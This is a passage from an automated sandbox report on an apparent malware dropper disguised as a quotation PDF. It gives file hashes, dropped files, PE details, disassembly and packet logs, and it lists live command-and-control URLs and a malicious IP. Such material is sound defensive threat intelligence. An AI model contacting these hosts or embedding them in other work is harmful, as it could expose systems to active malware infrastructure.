              104.223.93.105 | Chuyen giao,pdf.vbs | malicious | nofearsw.in/swo/inc/11828554f46a7d.php
              104.223.93.105 | Dekont.vbs | malicious | nofearsw.in/swo/inc/11828554f46a7d.php
              104.223.93.105 | 3Bws6ne7Ye.exe | malicious | jlpack.email/file/Panel/five/fre.php
              104.223.93.105 | filDHjBKef.exe | malicious | jlpack.email/grace/Panel/five/fre.php

              Domains

              Match | Associated Sample Name / URL | Detection | Context
              slimpackage.com | __.exe | malicious | 104.223.93.105
              slimpackage.com | Purchase Order #5000012803.exe | malicious | 104.223.93.105

              ASN


              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Created / dropped Files

              C:\Users\user\AppData\Local\Temp\nsr3B6A.tmp
              Process:C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              File Type:data
              Category:dropped
              Size (bytes):250687
              Entropy (8bit):7.724868567895106
              Encrypted:false
              SSDEEP:3072:1DyoBWj0S6M6pd7gA/FY2eM203epRkhG2AW3cKGPx5UvG0TTxT5ToKbvosMUC1qk:BZS6M6v0OSV/pShtRMtIzxdvg
              MD5:17CCB3C022F9B93E6E7E2A40C253DE9B
              SHA1:4D99B2643277CCA9B2FFC1DB5E9247212EA155F0
              SHA-256:AB11BFD0AF1FE8B3C42E933F37DFDA582152FFF477AA9DDE4EBB1ADFBD7BC72E
              SHA-512:E292772D295B45C85E79D6CE37F607F977F20F337DA679B6A2EA78D436631D6DAA9CB844D70A6239F851E1709309D94A0EB808C8AA949A0FB4393F3876333282
              Malicious:false
              Reputation:low
              C:\Users\user\AppData\Local\Temp\nsr3B6B.tmp\tncvu.dll
              Process:C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):4096
              Entropy (8bit):3.801392215291429
              Encrypted:false
              SSDEEP:24:e1GSb0JDlOErEcQeV3ax/+FBFUQahkFsAryvDTy2La5DTyxk8q6I1nPnRuV4MPgs:SgZF4h6FBFUQYXze9r6IPRuqStkx
              MD5:7F8DBC496B4EB973EC6509A63B7A4C01
              SHA1:E3E07E016B3A97604B94CBF8CB2C0FC0BF21033D
              SHA-256:4B229D563D725A5F994DEBF010F24F43D6078C18EF1D56628F9815372CA45FC6
              SHA-512:D4331F90CE80A5E95CF9E6DD008B6268C733B3A8D0C3CB6200511961126093D5FF0DE73D69F5689E9D7495EBAA8A69EBAE8089B45E080928BE2D37C9FF003E0D
              Malicious:false
              Reputation:low
              C:\Users\user\AppData\Local\Temp\pdqlrunrcm
              Process:C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              File Type:DOS executable (COM)
              Category:dropped
              Size (bytes):5136
              Entropy (8bit):6.121649200700411
              Encrypted:false
              SSDEEP:96:N+CSmQtQfy1mW8itQYKA36VwVmgEVBS0SNxjzvZOXVYBnZ5r:N+CSmQKK1mWBtQlAtVDEVtS7PvnPr
              MD5:B97AC6F1BFD2778EC14E068EBCEC96AE
              SHA1:AE5C7D27BE7135FD5765A337CBA06CAA65E943A9
              SHA-256:065853BAB7BD450615B9697F39486EB81AB42F34AA502BB8BBC9631FCA53C608
              SHA-512:AF68D42ED2C127C2354BAEE151F23C967386C215EF9523943D594D85F94C208EC3C31D20479DAE1D5C6CBDBB4CABED88B4EF1555C17C98A6737446971870C72E
              Malicious:false
              Reputation:low
              C:\Users\user\AppData\Local\Temp\wtmxan9q1x7moo
              Process:C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              File Type:data
              Category:dropped
              Size (bytes):216745
              Entropy (8bit):7.990426242680324
              Encrypted:true
              SSDEEP:3072:uWj0S6M6pd7gA/FY2eM203epRkhG2AW3cKGPx5UvG0TTxT5ToKbvosMUC1qi:SS6M6v0OSV/pShtRMtIzxdvgT
              MD5:BAC58EACE647B10E7E15CCD5BCB67309
              SHA1:60C8B10660CA6837C542855B77AA703139D6D02B
              SHA-256:C35DD027079BE254D7EE5FBA88646D3BB6DCBDED2356041512441E1FBF08A1AE
              SHA-512:6A1F087896210D9811C4E6352ED8D02323F50F1754FA3590B3DD1782F344689FD275D0375676D296BBBE4CA50399B83D39937CB52A2F7743012C442C8AEE4135
              Malicious:false
              Reputation:low
              C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck
              Process:C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              File Type:very short file (no magic)
              Category:dropped
              Size (bytes):1
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:3:U:U
              MD5:C4CA4238A0B923820DCC509A6F75849B
              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
              Malicious:false
              Reputation:high, very likely benign file
              Preview: 1
              C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\414045e2d09286d5db2581e0d955d358_d06ed635-68f6-4e9a-955c-4899f5f57b9a
              Process:C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              File Type:data
              Category:dropped
              Size (bytes):46
              Entropy (8bit):1.0424600748477153
              Encrypted:false
              SSDEEP:3:/lbON:u
              MD5:89CA7E02D8B79ED50986F098D5686EC9
              SHA1:A602E0D4398F00C827BFCF711066E67718CA1377
              SHA-256:30AC626CBD4A97DB480A0379F6D2540195F594C967B7087A26566E352F24C794
              SHA-512:C5F453E32C0297E51BE43F84A7E63302E7D1E471FADF8BB789C22A4D6E03712D26E2B039D6FBDBD9EBD35C4E93EC27F03684A7BBB67C4FADCCE9F6279417B5DE
              Malicious:false
              Reputation:moderate, very likely benign file
              Preview: ........................................user.

              Static File Info

              General

              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
              Entropy (8bit):7.862243713227495
              TrID:
              • Win32 Executable (generic) a (10002005/4) 92.16%
              • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:QUOTAZIONEpdf.exe
              File size:250601
              MD5:23b85c2f43b23b57411e4f4366a10b25
              SHA1:1511bfee72f99f691c93a1e6b070724890c6aea8
              SHA256:9ad929181f755701c0152618393ccff03e0499944c2e3f22fa2d0539347f5c45
              SHA512:7762714729e6bcbec554e573554ac5a78333a36369c3fe2a81c17fac2810b0b19fa191f05119a4805f7de27f15d2c9252ede56e3dd4b9799cce7593bbd8ae769
              SSDEEP:6144:/wC3lY9KbXDPmKY9xUa07Bv0pe59CGKZDcMbDpTHle:5q0WKASKpCyZwwDlHle

              File Icon

              Icon Hash:1c188bca1b2d565b

              Static PE Info

              General

              Entrypoint:0x403225
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
              DLL Characteristics:
              Time Stamp:0x48EFCDC9 [Fri Oct 10 21:48:57 2008 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:4
              OS Version Minor:0
              File Version Major:4
              File Version Minor:0
              Subsystem Version Major:4
              Subsystem Version Minor:0
              Import Hash:099c0646ea7282d232219f8807883be0

              Entrypoint Preview

              Instruction
              sub esp, 00000180h
              push ebx
              push ebp
              push esi
              xor ebx, ebx
              push edi
              mov dword ptr [esp+18h], ebx
              mov dword ptr [esp+10h], 00409128h
              xor esi, esi
              mov byte ptr [esp+14h], 00000020h
              call dword ptr [00407030h]
              push 00008001h
              call dword ptr [004070B4h]
              push ebx
              call dword ptr [0040727Ch]
              push 00000008h
              mov dword ptr [00423F58h], eax
              call 00007FAFA8C66570h
              mov dword ptr [00423EA4h], eax
              push ebx
              lea eax, dword ptr [esp+34h]
              push 00000160h
              push eax
              push ebx
              push 0041F450h
              call dword ptr [00407158h]
              push 004091B0h
              push 004236A0h
              call 00007FAFA8C66227h
              call dword ptr [004070B0h]
              mov edi, 00429000h
              push eax
              push edi
              call 00007FAFA8C66215h
              push ebx
              call dword ptr [0040710Ch]
              cmp byte ptr [00429000h], 00000022h
              mov dword ptr [00423EA0h], eax
              mov eax, edi
              jne 00007FAFA8C63A3Ch
              mov byte ptr [esp+14h], 00000022h
              mov eax, 00429001h
              push dword ptr [esp+14h]
              push eax
              call 00007FAFA8C65D08h
              push eax
              call dword ptr [0040721Ch]
              mov dword ptr [esp+1Ch], eax
              jmp 00007FAFA8C63A95h
              cmp cl, 00000020h
              jne 00007FAFA8C63A38h
              inc eax
              cmp byte ptr [eax], 00000020h
              je 00007FAFA8C63A2Ch
              cmp byte ptr [eax], 00000022h
              mov byte ptr [eax+eax+00h], 00000000h

              Rich Headers

              Programming Language:
              • [EXP] VC++ 6.0 SP5 build 8804

              Data Directories

              Name | Virtual Address | Virtual Size | Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_IMPORT | 0x73a4 | 0xb4 | .rdata
              IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x2c000 | 0x4148 | .rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x28c | .rdata
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

              Sections

              Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
              .text | 0x1000 | 0x5976 | 0x5a00 | False | 0.668619791667 | data | 6.46680044621 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              .rdata | 0x7000 | 0x1190 | 0x1200 | False | 0.444878472222 | data | 5.17796812871 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .data | 0x9000 | 0x1af98 | 0x400 | False | 0.55078125 | data | 4.68983486809 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
              .ndata | 0x24000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .rsrc | 0x2c000 | 0x4148 | 0x4200 | False | 0.441169507576 | data | 5.0955746829 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

              Resources

              Name | RVA | Size | Type | Language | Country
              RT_ICON | 0x2c1f0 | 0x25a8 | dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 4294967295, next used block 4294967295 | English | United States
              RT_ICON | 0x2e798 | 0x10a8 | dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 4294374645, next used block 4294967295 | English | United States
              RT_ICON | 0x2f840 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
              RT_DIALOG | 0x2fca8 | 0x100 | data | English | United States
              RT_DIALOG | 0x2fda8 | 0x11c | data | English | United States
              RT_DIALOG | 0x2fec8 | 0x60 | data | English | United States
              RT_GROUP_ICON | 0x2ff28 | 0x30 | data | English | United States
              RT_MANIFEST | 0x2ff58 | 0x1eb | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States

              Imports

              DLL | Import
              KERNEL32.dll | CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetFileTime, GetTempPathA, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetWindowsDirectoryA
              USER32.dll | EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
              GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
              SHELL32.dll | SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
              ADVAPI32.dll | RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
              COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
              ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
              VERSION.dll | GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

              Possible Origin

              Language of compilation system | Country where language is spoken | Map
              English | United States |

              Network Behavior

              Snort IDS Alerts


              Network Port Distribution

              TCP Packets

              Jan 14, 2022 09:52:46.249346018 CET4974780192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:46.373480082 CET8049747104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:46.373621941 CET4974780192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:46.652462959 CET4974780192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:46.776640892 CET8049747104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:46.776705980 CET4974780192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:46.900899887 CET8049747104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:46.909101009 CET8049747104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:46.909140110 CET8049747104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:46.909204960 CET4974780192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:46.909245014 CET4974780192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:47.033881903 CET8049747104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:48.811659098 CET4974880192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:48.934251070 CET8049748104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:48.934369087 CET4974880192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:48.938221931 CET4974880192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:49.060755968 CET8049748104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:49.060915947 CET4974880192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:49.243834019 CET8049748104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:49.243886948 CET8049748104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:49.243917942 CET8049748104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:49.244081974 CET4974880192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:49.244112968 CET4974880192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:49.367177010 CET8049748104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:50.187966108 CET4974980192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:50.311187983 CET8049749104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:50.311356068 CET4974980192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:50.316401958 CET4974980192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:50.509155035 CET8049749104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:50.509278059 CET4974980192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:50.631927013 CET8049749104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:50.639916897 CET8049749104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:50.639950991 CET8049749104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:50.640219927 CET4974980192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:50.640306950 CET4974980192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:50.763415098 CET8049749104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:51.683743000 CET4975080192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:51.808108091 CET8049750104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:51.808275938 CET4975080192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:51.814681053 CET4975080192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:51.939219952 CET8049750104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:51.939326048 CET4975080192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:52.063545942 CET8049750104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:52.091804981 CET8049750104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:52.091821909 CET8049750104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:52.091917038 CET4975080192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:52.091964960 CET4975080192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:52.217159033 CET8049750104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:53.110362053 CET4975180192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:53.241544008 CET8049751104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:53.241792917 CET4975180192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:53.249068975 CET4975180192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:53.402643919 CET8049751104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:53.402760029 CET4975180192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:53.541673899 CET8049751104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:53.547552109 CET8049751104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:53.547600985 CET8049751104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:53.547725916 CET4975180192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:53.547775030 CET4975180192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:53.699661016 CET8049751104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:54.536000013 CET4975280192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:54.662133932 CET8049752104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:54.662336111 CET4975280192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:54.669015884 CET4975280192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:54.793598890 CET8049752104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:54.793697119 CET4975280192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:54.918317080 CET8049752104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:54.926312923 CET8049752104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:54.926353931 CET8049752104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:54.926480055 CET4975280192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:54.926565886 CET4975280192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:55.051983118 CET8049752104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:57.082355976 CET4975580192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:57.205127954 CET8049755104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:57.205348969 CET4975580192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:57.212577105 CET4975580192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:57.335016966 CET8049755104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:57.335104942 CET4975580192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:57.457921982 CET8049755104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:57.467825890 CET8049755104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:57.467847109 CET8049755104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:57.468019009 CET4975580192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:57.468064070 CET4975580192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:57.591134071 CET8049755104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:59.481087923 CET4975680192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:59.603635073 CET8049756104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:59.603874922 CET4975680192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:59.611439943 CET4975680192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:59.738342047 CET8049756104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:59.738571882 CET4975680192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:59.861166000 CET8049756104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:59.868741035 CET8049756104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:59.868834019 CET8049756104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:59.868901968 CET4975680192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:59.868959904 CET4975680192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:59.991909027 CET8049756104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:01.983010054 CET4975780192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:02.115494967 CET8049757104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:02.115658045 CET4975780192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:02.120827913 CET4975780192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:02.245244980 CET8049757104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:02.245347023 CET4975780192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:02.369695902 CET8049757104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:02.376370907 CET8049757104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:02.376394987 CET8049757104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:02.376497984 CET4975780192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:02.376540899 CET4975780192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:02.502068043 CET8049757104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:03.852472067 CET4975880192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:03.976937056 CET8049758104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:03.977104902 CET4975880192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:03.980417013 CET4975880192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:04.106069088 CET8049758104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:04.106193066 CET4975880192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:04.230422020 CET8049758104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:04.236856937 CET8049758104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:04.236879110 CET8049758104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:04.236958027 CET4975880192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:04.237023115 CET4975880192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:04.361481905 CET8049758104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:06.792172909 CET4975980192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:06.921638966 CET8049759104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:06.921735048 CET4975980192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:06.924773932 CET4975980192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:07.074414015 CET8049759104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:07.074510098 CET4975980192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:07.224203110 CET8049759104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:07.233124971 CET8049759104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:07.233251095 CET8049759104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:07.233354092 CET4975980192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:07.233484030 CET4975980192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:07.357954979 CET8049759104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:08.473609924 CET4976080192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:08.597876072 CET8049760104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:08.598007917 CET4976080192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:08.606764078 CET4976080192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:08.731045961 CET8049760104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:08.732410908 CET4976080192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:08.856570005 CET8049760104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:08.864233971 CET8049760104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:08.864391088 CET4976080192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:08.864398956 CET8049760104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:08.864473104 CET4976080192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:08.989067078 CET8049760104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:10.149791956 CET4976180192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:10.304790974 CET8049761104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:10.304899931 CET4976180192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:10.307977915 CET4976180192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:10.499644995 CET8049761104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:10.502069950 CET4976180192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:10.626019955 CET8049761104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:10.631426096 CET8049761104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:10.631444931 CET8049761104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:10.631601095 CET4976180192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:10.631634951 CET4976180192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:10.842083931 CET8049761104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:11.564274073 CET4976280192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:11.687297106 CET8049762104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:11.687455893 CET4976280192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:11.692209005 CET4976280192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:11.815099001 CET8049762104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:11.815228939 CET4976280192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:11.938086987 CET8049762104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:11.946695089 CET8049762104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:11.946809053 CET8049762104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:11.946926117 CET4976280192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:11.947052002 CET4976280192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:12.070259094 CET8049762104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:13.263689995 CET4976380192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:13.387890100 CET8049763104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:13.388015985 CET4976380192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:13.390691996 CET4976380192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:13.515155077 CET8049763104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:13.515346050 CET4976380192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:13.639585972 CET8049763104.223.93.105192.168.2.3
